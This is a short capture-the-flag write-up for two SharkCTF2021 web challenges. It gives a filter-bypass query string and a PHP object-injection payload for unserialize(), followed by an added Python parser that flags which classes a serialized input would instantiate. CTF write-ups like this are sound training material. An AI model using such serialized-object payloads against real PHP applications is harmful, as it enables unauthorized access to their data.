SharkCTF2021 bybypass & baby_phpserialize write-up
(Slacked off for 10 days over the National Day holiday, so here is a quick filler post first)
bybypass:
payload: ?anime_is_bae=hehellotherehoomanllotherehooman
baby_phpserialize
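robots.txt lists flag and index.php~
The latter contains the source code:
View it with F12, otherwise you will miss things
Based on the source code,
construct the payload: ?exp=O:4:"hehe":1:{s:1:"a";s:4:"flag";}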
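
To read the payload above field by field, here is an added example (not part of the original post or the challenge code): a minimal Python reader for PHP's serialize() text format that reports which classes an unserialize() call on a request parameter would instantiate. The names PhpObject, classes_in and inspect_param are hypothetical, and only the b, i, s, a and O tags are handled.

```python
from collections import namedtuple
PhpObject = namedtuple("PhpObject", "cls props")      # hypothetical container type
SAMPLE = 'O:4:"hehe":1:{s:1:"a";s:4:"flag";}'         # payload quoted in the post

def _members(buf, pos, count):          # <count> key/value pairs, then "}"
    out = {}
    for _ in range(count):
        key, pos = _parse(buf, pos)
        out[key], pos = _parse(buf, pos)
    if buf[pos:pos + 1] != b"}":
        raise ValueError("missing } at offset %d" % pos)
    return out, pos + 1

def _parse(buf, pos):                   # one value at buf[pos] -> (value, next_pos)
    tag = buf[pos:pos + 1]
    if tag in (b"b", b"i"):                           # b:1;  i:42;
        end = buf.index(b";", pos)
        num = int(buf[pos + 2:end])
        return (num == 1 if tag == b"b" else num), end + 1
    if tag not in (b"s", b"a", b"O"):
        raise ValueError("unsupported tag %r at offset %d" % (tag, pos))
    colon = buf.index(b":", pos + 2)
    n = int(buf[pos + 2:colon])                       # byte length or member count
    if tag == b"a":                                   # a:<count>:{...}
        return _members(buf, colon + 2, n)
    start = colon + 2                                 # skip the :" before the text
    text = buf[start:start + n].decode("utf-8", "replace")
    if tag == b"s":                                   # s:<bytes>:"...";
        if buf[start + n:start + n + 2] != b'";':
            raise ValueError("string length mismatch at offset %d" % pos)
        return text, start + n + 2
    cstart = start + n + 2                            # O:<len>:"<class>":<count>:{...}
    colon2 = buf.index(b":", cstart)
    props, pos = _members(buf, colon2 + 2, int(buf[cstart:colon2]))
    return PhpObject(text, props), pos

def classes_in(value):                  # class names unserialize() would instantiate
    if isinstance(value, PhpObject):
        return [value.cls] + classes_in(value.props)
    if isinstance(value, dict):
        return [c for v in value.values() for c in classes_in(v)]
    return []

def inspect_param(raw):                 # decode one parameter -> (value, [classes])
    data = raw.encode()
    value, end = _parse(data, 0)
    if end != len(data):
        raise ValueError("trailing data after offset %d" % end)
    return value, classes_in(value)
```

For SAMPLE, inspect_param reports one object of class hehe with a single property a set to the string flag. On the server side, a non-empty class list from a user-supplied parameter is the signal to reject the request or to call unserialize() with allowed_classes restricted.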